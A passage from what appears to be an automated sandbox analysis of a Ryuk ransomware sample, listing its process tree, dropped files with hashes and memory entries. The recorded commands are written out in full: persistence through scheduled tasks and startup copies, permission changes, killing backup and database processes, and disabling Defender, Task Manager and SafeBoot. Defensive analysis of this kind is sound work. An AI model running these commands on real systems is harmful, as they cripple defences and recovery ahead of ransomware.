cmd.exe PID 3828 wrote to memory of 3580 3828 cmd.exe cmd.exe PID 3828 wrote to memory of 3580 3828 cmd.exe cmd.exe PID 3064 wrote to memory of 3508 3064 cmd.exe reg.exe PID 3064 wrote to memory of 3508 3064 cmd.exe reg.exe PID 3828 wrote to memory of 2752 3828 cmd.exe taskkill.exe PID 3828 wrote to memory of 2752 3828 cmd.exe taskkill.exe PID 1384 wrote to memory of 4720 1384 cmd.exe icacls.exe PID 1384 wrote to memory of 4720 1384 cmd.exe icacls.exe PID 4116 wrote to memory of 1188 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 1188 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 3580 wrote to memory of 3380 3580 cmd.exe taskkill.exe PID 3580 wrote to memory of 3380 3580 cmd.exe taskkill.exe PID 4116 wrote to memory of 2304 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 2304 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 4964 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 4964 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 3504 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 3504 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 1048 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 1048 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 1904 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 4116 wrote to memory of 1904 4116 be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe cmd.exe PID 1904 wrote to memory of 4960 1904 cmd.exe reg.exe PID 1904 wrote to memory of 4960 1904 cmd.exe reg.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 4944 attrib.exe 1780 attrib.exe 1748 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe"C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"3⤵
- Drops startup file
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s ryuk.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\ryuk.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog22⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\RYUKIDFilesize
8B
MD5b01925eb79aff868999d7be561726324
SHA1b005a53561fa9014d5c7cb0bf3957dfa57a7bada
SHA256b903fbfd70ec7520a68c3492f98ade4bf7ef8fd59353108faa7ea9583e2b1351
SHA512f47764a971de47e8ca400e60ea950a339c86b213c20c29b392bfc9f83750280050f2d0ebd4d4d36cd4b956c906df31b543b394dcf42e3f92797f8eb044630b74
-
C:\ProgramData\RyukReadMe.txtFilesize
1KB
MD5fdb92b73b4370f248e57b5292cb4b507
SHA15d86a3818e4c38d4821372900f21f8ec62d97efc
SHA25640f33de8d0fd8293c3d03b3b2a043c7e4e96393510e686b90acebf485bbf0477
SHA51276b35870a8c7a29a0ce36e548531dc6b09abb51b52781835c87fb7e6c276b84948137aa9f001b717ca0b9ffb0b27f47bae5fbb1be483aa74dbd2542409c387a9
-
C:\ProgramData\hrmlog1Filesize
2KB
MD5ff8feba02850750ae3acad613386c7ed
SHA11421b720388fa05fddf2a862f3994bc181b489be
SHA25685c14336594b6da93be145ee495414f6550b1e9f47728a31e1acb7d822ecd945
SHA512e8765fe8fd3413b833fbd2b0e76ea0e71b6079acf78a8ba7dc4adf19af00b7749eb48030e3cd62933b3842fd8d2d12e7bb4cdc64f33fdb1953282e83a63063ec
-
C:\ProgramData\hrmlog1Filesize
2KB
MD5ff8feba02850750ae3acad613386c7ed
SHA11421b720388fa05fddf2a862f3994bc181b489be
SHA25685c14336594b6da93be145ee495414f6550b1e9f47728a31e1acb7d822ecd945
SHA512e8765fe8fd3413b833fbd2b0e76ea0e71b6079acf78a8ba7dc4adf19af00b7749eb48030e3cd62933b3842fd8d2d12e7bb4cdc64f33fdb1953282e83a63063ec
-
C:\ProgramData\hrmlog2Filesize
292B
MD52c0abc2f3a1febd00ca8f8fee4bd2683
SHA156e1028e3bd457270089d470af7b3edbb344aca8
SHA256f4942012d19f5ae56209c3b9c1b6cb6a7ee4b5dcd0dc0e74a93bb8ad6f52d6a1
SHA5125ad31220773af2ddef907f85908e334f433675db8863559df6ff7afde29771539a7938d710f2cfc6f225916c5bf7d5b96566fe856d924c0fb7ff57829b603bbc
-
C:\ProgramData\hrmlog2Filesize
292B
MD52c0abc2f3a1febd00ca8f8fee4bd2683
SHA156e1028e3bd457270089d470af7b3edbb344aca8
SHA256f4942012d19f5ae56209c3b9c1b6cb6a7ee4b5dcd0dc0e74a93bb8ad6f52d6a1
SHA5125ad31220773af2ddef907f85908e334f433675db8863559df6ff7afde29771539a7938d710f2cfc6f225916c5bf7d5b96566fe856d924c0fb7ff57829b603bbc
-
C:\ProgramData\ryuk.exeFilesize
885KB
MD5622bc38dee08e70e91e2be32a58b6d1f
SHA17cfec4859fa7ca178095983b3f174f842a44b0c2
SHA256be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a
SHA512176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d
-
C:\Users\Admin\AppData\Local\Temp\RYUKIDFilesize
8B
MD5b01925eb79aff868999d7be561726324
SHA1b005a53561fa9014d5c7cb0bf3957dfa57a7bada
SHA256b903fbfd70ec7520a68c3492f98ade4bf7ef8fd59353108faa7ea9583e2b1351
SHA512f47764a971de47e8ca400e60ea950a339c86b213c20c29b392bfc9f83750280050f2d0ebd4d4d36cd4b956c906df31b543b394dcf42e3f92797f8eb044630b74
-
C:\Users\Admin\AppData\Local\Temp\hrmlog1Filesize
2KB
MD5ff8feba02850750ae3acad613386c7ed
SHA11421b720388fa05fddf2a862f3994bc181b489be
SHA25685c14336594b6da93be145ee495414f6550b1e9f47728a31e1acb7d822ecd945
SHA512e8765fe8fd3413b833fbd2b0e76ea0e71b6079acf78a8ba7dc4adf19af00b7749eb48030e3cd62933b3842fd8d2d12e7bb4cdc64f33fdb1953282e83a63063ec
-
C:\Users\Admin\AppData\Local\Temp\hrmlog2Filesize
292B
MD52c0abc2f3a1febd00ca8f8fee4bd2683
SHA156e1028e3bd457270089d470af7b3edbb344aca8
SHA256f4942012d19f5ae56209c3b9c1b6cb6a7ee4b5dcd0dc0e74a93bb8ad6f52d6a1
SHA5125ad31220773af2ddef907f85908e334f433675db8863559df6ff7afde29771539a7938d710f2cfc6f225916c5bf7d5b96566fe856d924c0fb7ff57829b603bbc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exeFilesize
885KB
MD5622bc38dee08e70e91e2be32a58b6d1f
SHA17cfec4859fa7ca178095983b3f174f842a44b0c2
SHA256be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a
SHA512176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d
-
memory/116-146-0x0000000000000000-mapping.dmp
-
memory/408-179-0x0000000000000000-mapping.dmp
-
memory/920-142-0x0000000000000000-mapping.dmp
-
memory/1048-171-0x0000000000000000-mapping.dmp
-
memory/1188-160-0x0000000000000000-mapping.dmp
-
memory/1352-145-0x0000000000000000-mapping.dmp
-
memory/1384-152-0x0000000000000000-mapping.dmp
-
memory/1560-139-0x0000000000000000-mapping.dmp
-
memory/1740-133-0x0000000000000000-mapping.dmp
-
memory/1748-149-0x0000000000000000-mapping.dmp
-
memory/1780-147-0x0000000000000000-mapping.dmp
-
memory/1904-173-0x0000000000000000-mapping.dmp
-
memory/1920-150-0x0000000000000000-mapping.dmp
-
memory/2304-163-0x0000000000000000-mapping.dmp
-
memory/2428-180-0x0000000000000000-mapping.dmp
-
memory/2432-138-0x0000000000000000-mapping.dmp
-
memory/2692-143-0x0000000000000000-mapping.dmp
-
memory/2752-156-0x0000000000000000-mapping.dmp
-
memory/3064-151-0x0000000000000000-mapping.dmp
-
memory/3292-136-0x0000000000000000-mapping.dmp
-
memory/3380-161-0x0000000000000000-mapping.dmp
-
memory/3464-175-0x0000000000000000-mapping.dmp
-
memory/3504-169-0x0000000000000000-mapping.dmp
-
memory/3508-155-0x0000000000000000-mapping.dmp
-
memory/3552-148-0x0000000000000000-mapping.dmp
-
memory/3580-154-0x0000000000000000-mapping.dmp
-
memory/3828-153-0x0000000000000000-mapping.dmp
-
memory/3968-176-0x0000000000000000-mapping.dmp
-
memory/4172-178-0x0000000000000000-mapping.dmp
-
memory/4184-134-0x0000000000000000-mapping.dmp
-
memory/4232-177-0x0000000000000000-mapping.dmp
-
memory/4720-157-0x0000000000000000-mapping.dmp
-
memory/4736-144-0x0000000000000000-mapping.dmp
-
memory/4824-132-0x0000000000000000-mapping.dmp
-
memory/4828-137-0x0000000000000000-mapping.dmp
-
memory/4944-140-0x0000000000000000-mapping.dmp
-
memory/4960-174-0x0000000000000000-mapping.dmp
-
memory/4964-165-0x0000000000000000-mapping.dmp